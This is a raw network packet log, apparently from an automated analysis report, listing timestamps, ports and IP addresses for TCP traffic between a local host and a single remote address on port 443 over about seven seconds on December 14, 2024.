                                                                                                                            Dec 14, 2024 13:49:25.027545929 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.027578115 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.030941010 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.031364918 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.065721035 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.080197096 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.085067987 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.150751114 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.151108980 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.260718107 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.263907909 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.277461052 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.280705929 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.343229055 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.343353033 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.347867012 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.347898960 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.347984076 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.351958990 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.353097916 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.353921890 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.384748936 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.400481939 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.472397089 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.473645926 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.474545956 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.580310106 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.583544016 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.664823055 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.665152073 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.668030977 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.670490980 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.670509100 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.670557976 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.670623064 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.672980070 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.673131943 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.703525066 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.788172960 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.793046951 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.793061018 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.818289042 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.820939064 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.980478048 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.984297037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.985155106 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.985228062 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:25.989949942 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.989967108 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:25.990103006 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.150101900 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.172379971 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.219752073 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.227540016 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.227752924 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.228437901 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.228930950 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.347450972 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.347524881 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.348234892 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.348650932 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.364609003 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.379566908 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.542021036 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.545150042 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.545387983 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.545450926 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.556408882 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.556432962 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.556487083 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.561939001 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.577867031 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.581170082 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.581340075 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.681866884 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.697712898 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.701055050 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.701066017 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.737396002 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.740899086 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.890146971 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.893510103 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.897918940 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.897999048 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.898014069 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.898148060 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.900748968 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.900813103 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.929447889 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:26.929579020 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:26.931890011 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.022063971 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.082020044 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.084830046 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.214380980 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.217242002 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.217405081 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.217405081 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.217408895 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.217488050 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.220066071 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.220223904 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.274084091 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.274209023 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.277193069 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.339893103 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.382164001 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.397377014 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.406538010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.409792900 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.539016962 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.539084911 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.539336920 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.542408943 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.559113026 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.561150074 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.566633940 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.599112988 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.604029894 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.680919886 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.723756075 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.731054068 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.733748913 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.876339912 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.876420975 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.876583099 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.879606962 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.879740000 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.916368008 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.919307947 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.923213005 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:27.923290014 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.926136971 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:27.999880075 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.045859098 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.068473101 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.071809053 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.196949005 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.196989059 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.197076082 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.200215101 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.200216055 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.260468006 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.263427019 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.320146084 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.384896040 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.388041019 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.389024019 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.391339064 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.511132002 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.515484095 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.515527010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.516014099 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.518992901 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.519201994 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.585232973 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.588870049 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.638936043 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.706932068 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.706998110 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.707034111 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.707065105 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.710098028 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.710256100 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.750121117 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.829972982 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.830029964 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836390972 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836427927 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836584091 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.839802980 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.840832949 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.960623980 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.022258043 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.025605917 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.032186985 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.032265902 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.032394886 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.032394886 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.034827948 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.034929037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.154865026 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166826010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166860104 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166977882 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.170739889 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.172231913 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.292098045 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.347081900 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.350337029 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.356842995 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.356916904 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.357059002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.357059002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.359473944 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.359473944 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.479270935 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487579107 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487602949 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487724066 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.491496086 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.492311001 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.612054110 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.671423912 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674380064 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674413919 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674426079 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.675786972 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.681340933 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.683497906 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.801078081 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808715105 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808751106 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808892012 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.818154097 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.819210052 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.938977003 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.993357897 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.998238087 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.998342037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.998368979 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.026715994 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.034759045 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.042740107 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.135431051 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.135452986 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.135628939 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.146553040 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.148289919 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.154540062 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.206100941 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.268551111 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.270127058 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.341561079 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.351339102 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.355276108 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.355325937 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.357631922 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.460983038 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.464256048 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.465878010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.466001034 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.466020107 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.466144085 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.468674898 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.468893051 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.471193075 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.477596998 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.584124088 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.588484049 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.588556051 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.666448116 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.670193911 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.776544094 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.779516935 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.780611992 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.780687094 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.783044100 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.786501884 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.786556959 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.786567926 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.786628962 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.788845062 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.789182901 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.789997101 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.899399042 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.902810097 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.908582926 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.908894062 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.984987020 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.988409042 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.095259905 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.097814083 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.100831032 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.100939989 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.102943897 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.105568886 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.105647087 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.105653048 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.105830908 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.107846022 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.107880116 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.108306885 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.217674971 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.222660065 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.229794979 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.229873896 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.303122997 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.305912971 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.415678978 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.419135094 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.421935081 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.422198057 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.424479008 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.426781893 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.426851034 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.426904917 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.426964998 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.430588007 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.431612968 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.544317007 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.551933050 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.631572962 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.634620905 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.736645937 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.739460945 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.743098021 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.743166924 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.745452881 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.748047113 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.748094082 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.748132944 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.748236895 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.752037048 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.753164053 CET49707443192.168.2.613.107.246.63
